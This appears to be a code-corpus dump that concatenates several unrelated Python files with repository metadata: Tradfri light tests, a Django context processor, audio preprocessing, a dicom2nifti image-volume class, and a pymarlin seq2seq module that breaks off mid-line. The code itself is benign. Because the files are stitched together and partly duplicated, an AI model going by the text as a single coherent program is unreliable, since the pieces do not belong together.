setattr(lc, "lights", [mock_light_data]) mock_light.light_control = lc return mock_light async def test_light(hass, mock_gateway, mock_api): """Test that lights are correctly added.""" features = {"can_set_dimmer": True, "can_set_color": True, "can_set_temp": True} state = { "state": True, "dimmer": 100, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } mock_gateway.mock_devices.append( mock_light(test_features=features, test_state=state) ) await setup_gateway(hass, mock_gateway, mock_api) lamp_1 = hass.states.get("light.tradfri_light_0") assert lamp_1 is not None assert lamp_1.state == "on" assert lamp_1.attributes["brightness"] == 100 assert lamp_1.attributes["hs_color"] == (0.549, 0.153) async def test_light_observed(hass, mock_gateway, mock_api): """Test that lights are correctly observed.""" light = mock_light() mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) assert len(light.observe.mock_calls) > 0 async def test_light_available(hass, mock_gateway, mock_api): """Test light available property.""" light = mock_light({"state": True}, n=1) light.reachable = True light2 = mock_light({"state": True}, n=2) light2.reachable = False mock_gateway.mock_devices.append(light) mock_gateway.mock_devices.append(light2) await setup_gateway(hass, mock_gateway, mock_api) assert hass.states.get("light.tradfri_light_1").state == "on" assert hass.states.get("light.tradfri_light_2").state == "unavailable" # Combine TURN_ON_TEST_CASES and TRANSITION_CASES_FOR_TESTS ALL_TURN_ON_TEST_CASES = [["test_features", "test_data", "expected_result", "id"], []] idx = 1 for tc in TURN_ON_TEST_CASES: for trans in TRANSITION_CASES_FOR_TESTS: case = deepcopy(tc) if trans is not None: case[1]["transition"] = trans case.append(idx) idx = idx + 1 ALL_TURN_ON_TEST_CASES[1].append(case) @pytest.mark.parametrize(*ALL_TURN_ON_TEST_CASES) async def test_turn_on( hass, mock_gateway, mock_api, test_features, test_data, expected_result, id ): """Test 
turning on a light.""" # Note pytradfri style, not hass. Values not really important. initial_state = { "state": False, "dimmer": 0, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } # Setup the gateway with a mock light. light = mock_light(test_features=test_features, test_state=initial_state, n=id) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_on service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_light_{}".format(id), **test_data}, blocking=True, ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses # State on command data. data = {"3311": [{"5850": 1}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_{}".format(id)) for k, v in expected_result.items(): if k == "state": assert states.state == v else: # Allow some rounding error in color conversions. assert states.attributes[k] == pytest.approx(v, abs=0.01) async def test_turn_off(hass, mock_gateway, mock_api): """Test turning off a light.""" state = {"state": True, "dimmer": 100} light = mock_light(test_state=state) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. 
await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_light_0"}, blocking=True ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses data = {"3311": [{}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_0") assert states.state == "off" def mock_group(test_state={}, n=0): """Mock a Tradfri group.""" default_state = {"state": False, "dimmer": 0} state = {**default_state, **test_state} mock_group = Mock(member_ids=[], observe=Mock(), **state) mock_group.name = "tradfri_group_{}".format(n) return mock_group async def test_group(hass, mock_gateway, mock_api): """Test that groups are correctly added.""" mock_gateway.mock_groups.append(mock_group()) state = {"state": True, "dimmer": 100} mock_gateway.mock_groups.append(mock_group(state, 1)) await setup_gateway(hass, mock_gateway, mock_api) group = hass.states.get("light.tradfri_group_0") assert group is not None assert group.state == "off" group = hass.states.get("light.tradfri_group_1") assert group is not None assert group.state == "on" assert group.attributes["brightness"] == 100 async def test_group_turn_on(hass, mock_gateway, mock_api): """Test turning on a group.""" group = mock_group() group2 = mock_group(n=1) group3 = mock_group(n=2) mock_gateway.mock_groups.append(group) mock_gateway.mock_groups.append(group2) mock_gateway.mock_groups.append(group3) await setup_gateway(hass, mock_gateway, mock_api) # Use 
the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_1", "brightness": 100}, blocking=True, ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_2", "brightness": 100, "transition": 1}, blocking=True, ) await hass.async_block_till_done() group.set_state.assert_called_with(1) group2.set_dimmer.assert_called_with(100) group3.set_dimmer.assert_called_with(100, transition_time=10) async def test_group_turn_off(hass, mock_gateway, mock_api): """Test turning off a group.""" group = mock_group({"state": True}) mock_gateway.mock_groups.append(group) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.async_block_till_done() group.set_state.assert_called_with(0)
0
0
0
6b3c1d8a07e268a18b08211e3dee8a308ba8a690
144
py
Python
main/context_processors.py
Aaron1011/texting_wall
c20b421652fbdaef927e9d206fc17d8f1f40ae46
[ "MIT" ]
null
null
null
main/context_processors.py
Aaron1011/texting_wall
c20b421652fbdaef927e9d206fc17d8f1f40ae46
[ "MIT" ]
null
null
null
main/context_processors.py
Aaron1011/texting_wall
c20b421652fbdaef927e9d206fc17d8f1f40ae46
[ "MIT" ]
null
null
null
from texting_wall import settings as django_settings
28.8
65
0.826389
from texting_wall import settings as django_settings def analytics(request): return {'GOOGLE_ANALYTICS': django_settings.GOOGLE_ANALYTICS}
68
0
23
75bbbe94c8482fd95f86698a468a6f4f4f6262de
2,620
py
Python
utils/preprocessing.py
birds-on-mars/birdsonearth
62921423b787ad8b81b8e60e8de42a3f6e113d88
[ "Apache-2.0" ]
13
2019-04-11T10:02:11.000Z
2021-12-01T22:27:18.000Z
utils/preprocessing.py
birds-on-mars/birdsonearth
62921423b787ad8b81b8e60e8de42a3f6e113d88
[ "Apache-2.0" ]
2
2019-12-17T13:31:09.000Z
2020-05-14T09:48:10.000Z
utils/preprocessing.py
birds-on-mars/birdsonearth
62921423b787ad8b81b8e60e8de42a3f6e113d88
[ "Apache-2.0" ]
2
2020-07-17T21:03:18.000Z
2021-07-14T02:09:31.000Z
import random import numpy as np import matplotlib.pyplot as plt import os import pandas as pd import torch from torch.utils.data import DataLoader, Dataset from torch.utils.data.sampler import SubsetRandomSampler import imp from librosa.core import load from librosa.output import write_wav from scipy.io import wavfile from utils import vggish_input imp.reload(vggish_input) def process_wavs_for_training(params): ''' iterates through data under root that must have the structure root/{classes}/{instances}. Data must be in integer(!) .wav format. Under save_to the same subdirectories save_to/{classes} are generated and for every instance vggish compatible inputs are generated according to the parameters specified in vggish_params.py Args: root (string): path to data root saveto (string): path to root where processed data is stored ''' if os.path.exists(params.mel_spec_root): print('spectrograms seem to have been computed') print('delete {} manually and rerun preprocessing or keep goint to use what is there.'.format( params.mel_spec_root)) return labels = os.listdir(params.data_root) for label in os.listdir(params.data_root): if not os.path.isdir(os.path.join(params.data_root, label)): continue print('processing data for label {}'.format(label)) os.makedirs(os.path.join(params.mel_spec_root, label)) for file in os.listdir(os.path.join(params.data_root, label)): data = vggish_input.wavfile_to_examples(os.path.join(params.data_root, label, file)) for i in range(data.shape[0]): np.save(os.path.join(params.mel_spec_root, label, file[:-4]+str(i)+'.npy'), data[i])
39.104478
102
0.695038
import random import numpy as np import matplotlib.pyplot as plt import os import pandas as pd import torch from torch.utils.data import DataLoader, Dataset from torch.utils.data.sampler import SubsetRandomSampler import imp from librosa.core import load from librosa.output import write_wav from scipy.io import wavfile from utils import vggish_input imp.reload(vggish_input) def preprocess(src, dst): y, sr = load(src) y *= 32768 y = y.astype(np.int16) wavfile.write(dst, rate=22050, data=y) def process_wavs_for_training(params): ''' iterates through data under root that must have the structure root/{classes}/{instances}. Data must be in integer(!) .wav format. Under save_to the same subdirectories save_to/{classes} are generated and for every instance vggish compatible inputs are generated according to the parameters specified in vggish_params.py Args: root (string): path to data root saveto (string): path to root where processed data is stored ''' if os.path.exists(params.mel_spec_root): print('spectrograms seem to have been computed') print('delete {} manually and rerun preprocessing or keep goint to use what is there.'.format( params.mel_spec_root)) return labels = os.listdir(params.data_root) for label in os.listdir(params.data_root): if not os.path.isdir(os.path.join(params.data_root, label)): continue print('processing data for label {}'.format(label)) os.makedirs(os.path.join(params.mel_spec_root, label)) for file in os.listdir(os.path.join(params.data_root, label)): data = vggish_input.wavfile_to_examples(os.path.join(params.data_root, label, file)) for i in range(data.shape[0]): np.save(os.path.join(params.mel_spec_root, label, file[:-4]+str(i)+'.npy'), data[i]) def summary(params): labels = [f for f in os.listdir(params.data_root) if os.path.isdir(os.path.join(params.data_root, f))] counts = [len(os.listdir(os.path.join(params.data_root, label))) for label in labels] df = pd.DataFrame(data={'labels':labels, 'instances':counts}) print('the following classes 
and numer of instances are found:\n') print(df) processed = os.path.exists(params.mel_spec_root) if processed: print('spectrograms for the data seem to have been computed under {} \ and will be used for training'.format(params.mel_spec_root)) else: print('spectrograms for the given data need to be computed by running \ preprocessing')
823
0
46
8ac93b1625af7009e5262f966de85fc5e93bd08d
11,215
py
Python
dicom2nifti/image_volume.py
JuanPabloMontoya271/dicom2nifti
dfea030fbc47ed9c43d7bb1c8a468c2be963a043
[ "MIT" ]
197
2016-04-05T15:24:23.000Z
2022-03-25T17:37:10.000Z
dicom2nifti/image_volume.py
JuanPabloMontoya271/dicom2nifti
dfea030fbc47ed9c43d7bb1c8a468c2be963a043
[ "MIT" ]
102
2017-05-12T07:08:48.000Z
2022-03-22T00:21:54.000Z
dicom2nifti/image_volume.py
JuanPabloMontoya271/dicom2nifti
dfea030fbc47ed9c43d7bb1c8a468c2be963a043
[ "MIT" ]
60
2016-12-13T22:11:56.000Z
2022-03-30T22:55:52.000Z
# -*- coding: utf-8 -*- """ Created on Fri Jun 7 07:40:20 2013 @author: abrys """ # To ignore numpy errors: # pylint: disable=E1101 import nibabel import numpy from dicom2nifti.common import get_nifti_data class Slice(object): """ Class containing all data for a single slice in an image volume """ original_data = None slice_orientation = None class SliceType(object): """ ENUM like container for the slice types """ AXIAL = 1 SAGITTAL = 2 CORONAL = 3 class SliceOrientation(object): """ Class containing the orientation of a slice """ x_component = None y_component = None normal_component = None x_inverted = False y_inverted = False class ImageVolume(object): """ Class representing an imagevolume. You can provide it with a nifti and can be used to get slices in a certain direction It will take the affine matrix into account to find the correct orientation """ def get_slice(self, slice_type, slice_number, time_point=0): """ Returns a slice of the dataset. slice.data contains the window/levelled values, in uint8 slice.original_data contains the original data for this slice :param time_point: in case of 4d nifti the 4th dimension :param slice_number: the slice number :param slice_type: tye slice type (AXIAL, SAGITTAL, CORONAL) """ slice_ = Slice() slice_.slice_number = slice_number # assert that slice_ number is withing the range assert slice_number >= 0 assert slice_number < self._get_number_of_slices(slice_type) slice_data = None if slice_type == SliceType.AXIAL: slice_data = self.__get_raw_slice__(slice_number, self.axial_orientation, time_point) slice_.slice_orientation = self.axial_orientation elif slice_type == SliceType.SAGITTAL: slice_data = self.__get_raw_slice__(slice_number, self.sagittal_orientation, time_point) slice_.slice_orientation = self.sagittal_orientation elif slice_type == SliceType.CORONAL: slice_data = self.__get_raw_slice__(slice_number, self.coronal_orientation, time_point) slice_.slice_orientation = self.coronal_orientation # make a copy of the 
slice_ so we do not modify the orignal slice_.original_data = slice_data return slice_ def _get_number_of_slices(self, slice_type): """ Get the number of slices in a certain direction """ if slice_type == SliceType.AXIAL: return self.dimensions[self.axial_orientation.normal_component] elif slice_type == SliceType.SAGITTAL: return self.dimensions[self.sagittal_orientation.normal_component] elif slice_type == SliceType.CORONAL: return self.dimensions[self.coronal_orientation.normal_component] def __calc_most_likely_direction__(transformed_x, transformed_y, transformed_z): """ Calculate which is the most likely component for a given direction """ # calculate the x component tx_dot_x = numpy.abs(numpy.dot(transformed_x, [1, 0, 0, 0])) tx_dot_y = numpy.abs(numpy.dot(transformed_x, [0, 1, 0, 0])) tx_dot_z = numpy.abs(numpy.dot(transformed_x, [0, 0, 1, 0])) x_dots = [tx_dot_x, tx_dot_y, tx_dot_z] x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) # calculate the y component ty_dot_x = numpy.abs(numpy.dot(transformed_y, [1, 0, 0, 0])) ty_dot_y = numpy.abs(numpy.dot(transformed_y, [0, 1, 0, 0])) ty_dot_z = numpy.abs(numpy.dot(transformed_y, [0, 0, 1, 0])) y_dots = [ty_dot_x, ty_dot_y, ty_dot_z] y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) # calculate the z component tz_dot_x = numpy.abs(numpy.dot(transformed_z, [1, 0, 0, 0])) tz_dot_y = numpy.abs(numpy.dot(transformed_z, [0, 1, 0, 0])) tz_dot_z = numpy.abs(numpy.dot(transformed_z, [0, 0, 1, 0])) z_dots = [tz_dot_x, tz_dot_y, tz_dot_z] z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) # as long as there are duplicate directions try to correct while x_component == y_component or x_component == z_component or y_component == z_component: if x_component == y_component: # keep the strongest one and change the other if x_max >= y_max: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) else: # update the x component x_dots[x_component] = 
0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if x_component == z_component: # keep the strongest one and change the other if x_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if y_component == z_component: # keep the strongest one and change the other if y_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) return x_component, y_component, z_component
45.221774
115
0.659028
# -*- coding: utf-8 -*- """ Created on Fri Jun 7 07:40:20 2013 @author: abrys """ # To ignore numpy errors: # pylint: disable=E1101 import nibabel import numpy from dicom2nifti.common import get_nifti_data class Slice(object): """ Class containing all data for a single slice in an image volume """ original_data = None slice_orientation = None class SliceType(object): """ ENUM like container for the slice types """ AXIAL = 1 SAGITTAL = 2 CORONAL = 3 class SliceOrientation(object): """ Class containing the orientation of a slice """ x_component = None y_component = None normal_component = None x_inverted = False y_inverted = False def load(nifti_file): nifti_image = nibabel.load(nifti_file) return ImageVolume(nifti_image) class ImageVolume(object): """ Class representing an imagevolume. You can provide it with a nifti and can be used to get slices in a certain direction It will take the affine matrix into account to find the correct orientation """ def __init__(self, nifti_image): self.nifti = nifti_image # assert that it is a 3D image self.nifti_data = get_nifti_data(self.nifti).squeeze() if self.nifti_data.ndim == 2: self.nifti_data = numpy.expand_dims(self.nifti_data, 2) if self.nifti_data.ndim != 3: assert self.nifti_data.ndim >= 3 # do some basic processing like setting dimensions and min/max values self.dimensions = self.nifti_data.shape self.axial_orientation = None self.coronal_orientation = None self.sagittal_orientation = None self.__calculate_slice_orientation__() def __calculate_slice_orientation__(self): # Not all image data has the same orientation # We use the affine matrix and multiplying it with one component # of the slice we can find the correct orientation affine_inverse = numpy.linalg.inv(self.nifti.affine) transformed_x = numpy.transpose(numpy.dot(affine_inverse, [[1], [0], [0], [0]]))[0] transformed_y = numpy.transpose(numpy.dot(affine_inverse, [[0], [1], [0], [0]]))[0] transformed_z = numpy.transpose(numpy.dot(affine_inverse, [[0], [0], [1], 
[0]]))[0] # calculate the most likely x,y,z direction x_component, y_component, z_component = __calc_most_likely_direction__(transformed_x, transformed_y, transformed_z) # Find slice orientiation for the axial size # Find the index of the max component to know which component is the direction in the size self.axial_orientation = SliceOrientation() self.axial_orientation.normal_component = z_component self.axial_orientation.x_component = x_component self.axial_orientation.x_inverted = numpy.sign(transformed_x[self.axial_orientation.x_component]) < 0 self.axial_orientation.y_component = y_component self.axial_orientation.y_inverted = numpy.sign(transformed_y[self.axial_orientation.y_component]) < 0 # Find slice orientiation for the coronal size # Find the index of the max component to know which component is the direction in the size self.coronal_orientation = SliceOrientation() self.coronal_orientation.normal_component = y_component self.coronal_orientation.x_component = x_component self.coronal_orientation.x_inverted = numpy.sign(transformed_x[self.coronal_orientation.x_component]) < 0 self.coronal_orientation.y_component = z_component self.coronal_orientation.y_inverted = numpy.sign(transformed_z[self.coronal_orientation.y_component]) < 0 # Find slice orientation for the sagittal size # Find the index of the max component to know which component is the direction in the size self.sagittal_orientation = SliceOrientation() self.sagittal_orientation.normal_component = x_component self.sagittal_orientation.x_component = y_component self.sagittal_orientation.x_inverted = numpy.sign(transformed_y[self.sagittal_orientation.x_component]) < 0 self.sagittal_orientation.y_component = z_component self.sagittal_orientation.y_inverted = numpy.sign(transformed_z[self.sagittal_orientation.y_component]) < 0 # Assert that the slice normals are not equal assert self.axial_orientation.normal_component != self.coronal_orientation.normal_component assert 
self.coronal_orientation.normal_component != self.sagittal_orientation.normal_component assert self.sagittal_orientation.normal_component != self.axial_orientation.normal_component def __get_raw_slice__(self, slice_number, slice_orientation, time_point=0): # Take the slice out of one of the timepoints of a 4 d nifti if len(self.nifti_data.shape) >= 4: if slice_orientation.normal_component == 0: slice_data = self.nifti_data[slice_number, :, :, time_point] elif slice_orientation.normal_component == 1: slice_data = self.nifti_data[:, slice_number, :, time_point] else: slice_data = self.nifti_data[:, :, slice_number, time_point] else: if slice_orientation.normal_component == 0: slice_data = self.nifti_data[slice_number, :, :] elif slice_orientation.normal_component == 1: slice_data = self.nifti_data[:, slice_number, :] else: slice_data = self.nifti_data[:, :, slice_number] # If the x_component is larger than the y_component we need to flip # As a consequence of the retrieval of the data the y component can be first # In this case we need to swap x and y if slice_orientation.x_component > slice_orientation.y_component: slice_data = numpy.swapaxes(slice_data, 0, 1) # Flip the numpy direction to display direction (only if needed) # Beware: the left right is actually up down in the image if not slice_orientation.y_inverted: slice_data = numpy.fliplr(slice_data) if not slice_orientation.x_inverted: slice_data = numpy.flipud(slice_data) return slice_data def get_slice(self, slice_type, slice_number, time_point=0): """ Returns a slice of the dataset. 
slice.data contains the window/levelled values, in uint8 slice.original_data contains the original data for this slice :param time_point: in case of 4d nifti the 4th dimension :param slice_number: the slice number :param slice_type: tye slice type (AXIAL, SAGITTAL, CORONAL) """ slice_ = Slice() slice_.slice_number = slice_number # assert that slice_ number is withing the range assert slice_number >= 0 assert slice_number < self._get_number_of_slices(slice_type) slice_data = None if slice_type == SliceType.AXIAL: slice_data = self.__get_raw_slice__(slice_number, self.axial_orientation, time_point) slice_.slice_orientation = self.axial_orientation elif slice_type == SliceType.SAGITTAL: slice_data = self.__get_raw_slice__(slice_number, self.sagittal_orientation, time_point) slice_.slice_orientation = self.sagittal_orientation elif slice_type == SliceType.CORONAL: slice_data = self.__get_raw_slice__(slice_number, self.coronal_orientation, time_point) slice_.slice_orientation = self.coronal_orientation # make a copy of the slice_ so we do not modify the orignal slice_.original_data = slice_data return slice_ def _get_number_of_slices(self, slice_type): """ Get the number of slices in a certain direction """ if slice_type == SliceType.AXIAL: return self.dimensions[self.axial_orientation.normal_component] elif slice_type == SliceType.SAGITTAL: return self.dimensions[self.sagittal_orientation.normal_component] elif slice_type == SliceType.CORONAL: return self.dimensions[self.coronal_orientation.normal_component] def __calc_most_likely_direction__(transformed_x, transformed_y, transformed_z): """ Calculate which is the most likely component for a given direction """ # calculate the x component tx_dot_x = numpy.abs(numpy.dot(transformed_x, [1, 0, 0, 0])) tx_dot_y = numpy.abs(numpy.dot(transformed_x, [0, 1, 0, 0])) tx_dot_z = numpy.abs(numpy.dot(transformed_x, [0, 0, 1, 0])) x_dots = [tx_dot_x, tx_dot_y, tx_dot_z] x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) # 
calculate the y component ty_dot_x = numpy.abs(numpy.dot(transformed_y, [1, 0, 0, 0])) ty_dot_y = numpy.abs(numpy.dot(transformed_y, [0, 1, 0, 0])) ty_dot_z = numpy.abs(numpy.dot(transformed_y, [0, 0, 1, 0])) y_dots = [ty_dot_x, ty_dot_y, ty_dot_z] y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) # calculate the z component tz_dot_x = numpy.abs(numpy.dot(transformed_z, [1, 0, 0, 0])) tz_dot_y = numpy.abs(numpy.dot(transformed_z, [0, 1, 0, 0])) tz_dot_z = numpy.abs(numpy.dot(transformed_z, [0, 0, 1, 0])) z_dots = [tz_dot_x, tz_dot_y, tz_dot_z] z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) # as long as there are duplicate directions try to correct while x_component == y_component or x_component == z_component or y_component == z_component: if x_component == y_component: # keep the strongest one and change the other if x_max >= y_max: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if x_component == z_component: # keep the strongest one and change the other if x_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the x component x_dots[x_component] = 0 x_component = numpy.argmax(x_dots) x_max = numpy.max(x_dots) if y_component == z_component: # keep the strongest one and change the other if y_max >= z_max: # update the z component z_dots[z_component] = 0 z_component = numpy.argmax(z_dots) z_max = numpy.max(z_dots) else: # update the y component y_dots[y_component] = 0 y_component = numpy.argmax(y_dots) y_max = numpy.max(y_dots) return x_component, y_component, z_component
5,355
0
104
6ca5840b2afb8548af45325d440f2ce279a04e57
8,291
py
Python
pymarlin/plugins/hf_seq2seq/module_classes.py
nifarn/PyMarlin
ea1f5f927aa85112ecebc206d53b5c3ee65704fa
[ "MIT" ]
20
2021-06-09T18:46:45.000Z
2022-02-09T01:08:13.000Z
pymarlin/plugins/hf_seq2seq/module_classes.py
nifarn/PyMarlin
ea1f5f927aa85112ecebc206d53b5c3ee65704fa
[ "MIT" ]
50
2021-06-09T17:50:35.000Z
2022-02-07T23:02:30.000Z
pymarlin/plugins/hf_seq2seq/module_classes.py
nifarn/PyMarlin
ea1f5f927aa85112ecebc206d53b5c3ee65704fa
[ "MIT" ]
5
2021-06-21T22:24:30.000Z
2021-12-21T17:08:21.000Z
from typing import List, Dict import torch from pymarlin.core import trainer_backend, module_interface, trainer from torch.utils.data import DataLoader # too long import from pymarlin.utils.stats import global_stats from pymarlin.utils.config_parser.custom_arg_parser import CustomArgParser from pymarlin.utils.distributed import rank_zero_only from pymarlin.utils.logger import getlogger from pymarlin.plugins import PluginModuleInterface from transformers import AutoModelForSeq2SeqLM from torch.optim.lr_scheduler import OneCycleLR import dataclasses from .data_classes import HfSeq2SeqData from .metric_utils import get_metric_func import re from filelock import FileLock try: import nltk NLTK_AVAILABLE = True except (ImportError, ModuleNotFoundError): NLTK_AVAILABLE = False if NLTK_AVAILABLE: with FileLock(".lock") as lock: nltk.download("punkt", quiet=True) @dataclasses.dataclass @dataclasses.dataclass @dataclasses.dataclass if __name__ == "__main__": config = CustomArgParser(yaml_file_arg_key="config_path").parse() print(config) dm = HfSeq2SeqData() dm.setup_datasets(root=config["data_path"]) tm = HfSeq2SeqModule(dm, **config["tm"], generate_kwargs=config["generate"]) TrainerBackendClass = eval("trainer_backend." + config["trainer_backend_class"]) tr = TrainerBackendClass() tr = trainer_backend.DDPTrainerBackend(tr) if config["dist"] else tr tmArgs = trainer.TrainerArguments( **config["tmgr"], stats_args=trainer.stats.StatInitArguments(**config["stat"]), writer_args=trainer.WriterInitArguments(**config["wrt"]), checkpointer_args=trainer.DefaultCheckpointerArguments(**config["chkp"]), ) if config["dist"]: tr = trainer_backend.DDPTrainerBackend(tr) else: tmArgs.distributed_training_args = trainer.DistributedTrainingArguments( local_rank=config["cuda"] ) trainer = trainer.Trainer(trainer_backend=tr, module=tm, args=tmArgs) trainer.validate()
34.260331
102
0.644554
from typing import List, Dict import torch from pymarlin.core import trainer_backend, module_interface, trainer from torch.utils.data import DataLoader # too long import from pymarlin.utils.stats import global_stats from pymarlin.utils.config_parser.custom_arg_parser import CustomArgParser from pymarlin.utils.distributed import rank_zero_only from pymarlin.utils.logger import getlogger from pymarlin.plugins import PluginModuleInterface from transformers import AutoModelForSeq2SeqLM from torch.optim.lr_scheduler import OneCycleLR import dataclasses from .data_classes import HfSeq2SeqData from .metric_utils import get_metric_func import re from filelock import FileLock try: import nltk NLTK_AVAILABLE = True except (ImportError, ModuleNotFoundError): NLTK_AVAILABLE = False if NLTK_AVAILABLE: with FileLock(".lock") as lock: nltk.download("punkt", quiet=True) @dataclasses.dataclass class ModelArguments: encoder_key: str = "bert" num_labels: int = None hf_model: str = "facebook/bart-base" tokenizer_path: str = None model_config_path: str = None model_config_file: str = "config.json" model_path: str = None model_file: str = "pytorch_model.bin" get_latest_ckpt: bool = True @dataclasses.dataclass class GenerateArguments: do_sample: bool = False num_beams: int = 1 length_penalty: float = 1.0 early_stopping: bool = False @dataclasses.dataclass class ModuleInterfaceArguments: max_lr: float = 2e-5 # Maximum learning rate. 
output_mode: str = "s2s" max_length_encoder: int = 128 max_length_decoder: int = 128 model_args: ModelArguments = ModelArguments() generate_args: GenerateArguments = GenerateArguments() metric: str = "rouge" class HfSeq2SeqModule(PluginModuleInterface): def __init__(self, data: HfSeq2SeqData, args: ModuleInterfaceArguments): super().__init__() self.args = args self.data = data self.auto_setup(AutoModelForSeq2SeqLM) self.logger = getlogger(__name__, log_level="DEBUG") self.metric_func = get_metric_func(self.args.metric) def get_optimizers_schedulers( self, estimated_global_steps_per_epoch: int, epochs: int ): optimizer = torch.optim.Adam(self.model.parameters(), self.args.max_lr) scheduler = OneCycleLR( optimizer, max_lr=self.args.max_lr, steps_per_epoch=estimated_global_steps_per_epoch, epochs=epochs, anneal_strategy="linear", ) self.schedulers = scheduler return [optimizer], [scheduler] def get_train_dataloader(self, sampler: torch.utils.data.Sampler, batch_size: int): train_ds = self.data.get_train_dataset() dl = DataLoader( train_ds, batch_size=batch_size, collate_fn=self.collate_fun, sampler=sampler(train_ds), ) return dl def get_val_dataloaders(self, sampler: torch.utils.data.Sampler, batch_size: int): val_ds = self.data.get_val_dataset() dl = DataLoader( val_ds, batch_size=batch_size, collate_fn=self.collate_fun, sampler=sampler(val_ds), ) return dl def collate_fun(self, batch): source, target = torch.utils.data._utils.collate.default_collate(batch) # this is probably truncating. repeat positional embeddings and increase embedding layer size. 
source_tokens = self.tokenizer( list(source), padding=True, truncation=True, return_tensors="pt", max_length=self.args.max_length_encoder, ) target_tokens = self.tokenizer( list(target), padding=True, truncation=True, return_tensors="pt", max_length=self.args.max_length_decoder, ) labels = target_tokens["input_ids"] labels[labels[:, :] == self.model.config.pad_token_id] = -100 source_tokens["labels"] = labels return source_tokens def train_step(self, global_step: int, batch, device): batch = batch.to(device) result = self.model.forward(**batch) global_stats.update("lr", self.schedulers.get_last_lr()[0], frequent=True) return result.loss def val_step(self, global_step: int, batch, device): self.logger.debug("inside val_step") batch = batch.to(device) # result = self.model.forward(**batch) self.logger.debug("pre-generate") outputs = self.model.generate( input_ids=batch.input_ids, attention_mask=batch.attention_mask, max_length=self.args.max_length_decoder, **dataclasses.asdict(self.args.generate_args), ) self.logger.debug("post-generate") labels = batch.labels self.logger.debug("pre-pad") labels = self._pad(labels, device) outputs = self._pad(outputs, device) self.logger.debug("post-pad") # print('output size', outputs.size()) # print('label size', labels.size()) self.logger.debug("returning...") return outputs, labels def _pad(self, outputs, device, max_len=None): padded_outputs = [] if max_len is None: max_len = self.args.max_length_decoder for output in outputs: # print('unpadded size', output.size()) padding = torch.tensor( (max_len - len(output)) * [self.tokenizer.pad_token_id] ).to(device) padded = torch.cat([output, padding]) # print('padded.size()',padded.size()) padded_outputs.append(padded) return torch.stack(padded_outputs) @rank_zero_only def on_end_val_epoch(self, global_step, *collated_output, key="default"): # move all batch decoding to here so that we can collate tensors in DDP self.logger.debug("inside on_end_val_epoch") outputs, labels = 
collated_output labels[labels[:, :] == -100] = self.model.config.pad_token_id self.logger.debug("pre-decode") preds, refs = [], [] for output, label in zip(outputs, labels): try: pred = self.tokenizer.decode( output, skip_special_tokens=True, clean_up_tokenization_spaces=True ) ref = self.tokenizer.decode( label, skip_special_tokens=True, clean_up_tokenization_spaces=True ) preds.append(pred) refs.append(ref) except Exception as e: self.logger.debug("hit decoding exception") self.logger.debug(e) self.logger.debug("post-decode") self.logger.debug(f"len(preds): {len(preds)}") self.logger.debug(f"len(refs): {len(refs)}") if len(preds) > 0: self.logger.debug(f"preds[0]: {preds[0]}") if len(refs) > 0: self.logger.debug(f"refs[0]: {refs[0]}") metrics = self.metric_func(preds, refs) for k in metrics: global_stats.update(key + "/val_" + k, metrics[k]) if __name__ == "__main__": config = CustomArgParser(yaml_file_arg_key="config_path").parse() print(config) dm = HfSeq2SeqData() dm.setup_datasets(root=config["data_path"]) tm = HfSeq2SeqModule(dm, **config["tm"], generate_kwargs=config["generate"]) TrainerBackendClass = eval("trainer_backend." + config["trainer_backend_class"]) tr = TrainerBackendClass() tr = 